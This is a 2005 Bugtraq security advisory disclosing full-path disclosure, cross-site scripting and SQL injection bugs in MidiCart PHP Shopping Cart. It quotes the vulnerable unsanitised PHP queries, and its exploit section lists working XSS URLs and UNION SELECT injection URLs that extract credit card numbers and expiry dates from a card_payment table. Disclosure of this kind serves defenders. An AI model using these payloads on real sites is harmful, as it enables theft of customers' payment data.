[hackgen-2005-#004] - Multiple bugs in MidiCart PHP Shopping Cart

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [hackgen-2005-#004] - Multiple bugs in MidiCart PHP Shopping Cart
From: Exoduks <exoduks@xxxxxxxxx>
Date: 5 May 2005 17:01:34 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


http://www.hackgen.org/advisories/hackgen-2005-004.txt

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'                          [hackgen-2005-#004]                       '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'              Multiple bugs in MidiCart PHP Shopping Cart           '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
  
  Software: MidiCart PHP Shopping Cart
  Homepage: http://www.midicart.com/
  Author: "Exoduks" - HackGen Team
  Release Date: 5 May, 2005
  Website: www.hackgen.org
  Mail: exoduks [at] gmail . com
  
 

 0x01 - Affected software description:
 -------------------------------------
 MidiCart is a Try-Before-You-Buy Shopping Cart Software, that provides all you 
need to 
 create, operate, and maintain a professional Internet shop. MidiCart ASP and 
PHP Shopping 
 Cart is extremely easy to use, flexible, powerful and affordable e-commerce 
solution for 
 your web site.              



 0x02 - Vulnerability Discription:
 ---------------------------------
 There are several vulnarabilities in midicart. First there are some full-path 
disclosure
 bugs because of some undefined variable and if php.ini is set to 
display_errors = on we 
 will see full path of the script. Second vulnerability is xss in item_list.php 
and 
 search_list.php file which doesn't have any checking of input string so it is 
possible to 
 inject some evil code and execute through the browser. Third bug is a sql 
injection also 
 in search_list.php, item_list.php and item_show.php file also because there 
isn't any 
 filtering and checking of input string which will be executed in mysql command 
so with 
 special crafted sql command we can get some sensitve information from database.
  


 0x03 - Vulnerability Code:
 --------------------------
 Code vulnarable to sql injectio in search_list.php file
 ...
 // database query to select the categories
 $result = mysql_query("select * from products WHERE $chose LIKE 
'%$searchstring%' ORDER BY 
 'maingroup','secondgroup','code_no' LIMIT 0, 100 ") ;
 ...

 Code vulnarable to sql injectio in item_show.php file
 // query to get the products of type $category
 $result = mysql_query("select * from products where(code_no = '$code_no') 
ORDER BY 'item'");


 0x04 - How to fix this bug:
 ---------------------------
 Vendor has beed contacted and he we probably publish new version of this 
shopping cart so go to 
 http://www.midicart.com/ and look for new version.


 0x05 - Exploit:
 ----------------

 Full-path disclosure !
 -----------------------
 http://site.com/shop/search_list.php
 http://site.com/shop/item_list.php
 http://site.com/shop/item_show.php
 
 XSS !
 ------
 http://site.com/shop/search_list.php?chose=item&searchstring=%3Cscri 
pt%3Ealert('Lamed%20!');%3C/script%3E
 
http://site.com/shop/item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
 
http://site.com/shop/item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
 
 SQL injection !
 ----------------
 http://site.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT 
null, null, CreditCard, 
 ExpDate,null, null, null, null, null, null, null, null, null, null, null, 
null, null, null, null, null, 
 null, null, null, null, null, null, null, null FROM card_payment /*

 http://site.com/shop/item_list.php?maingroup=-99 'UNION SELECT null, null, 
CreditCard, ExpDate,null, 
 null, null, null, null, null, null, null, null, null, null, null, null, null, 
null, null, null, null, 
 null, null, null, null, null, null FROM card_payment /*
 
 http://site.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, 
CreditCard, ExpDate,null, 
 null, null, null, null, null, null, null, null, null, null, null, null, null, 
null, null, null, null, 
 null, null, null, null, null, null FROM card_payment /*
 
 http://site.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, 
CreditCard, ExpDate,null, 
 null, null, null, null, null, null, null, null, null, null, null, null, null, 
null, null, null, null, 
 null, null, null, null, null, null FROM card_payment /* 

 * works with magic_quotes_gpc set to Off in php.ini file 



 0x006 - The End:
 ----------------
 And we are at the end again. Grejtttzz to blackhat.headcoders.net

                         ______________________________________
                          Written By Exoduks - www.hackgen.org

Prev by Date: Re: ASP.NET __VIEWSTATE crypto validation prone to replay attacks
Next by Date: Re: ASP.NET __VIEWSTATE crypto validation prone to replay attacks
Previous by thread: DMA[2005-0502a] - 'Apple OSX multiple Bluetooth vulnerabilities'
Next by thread: [USN-114-1] kimgio vulnerability
Index(es):
- Date
- Thread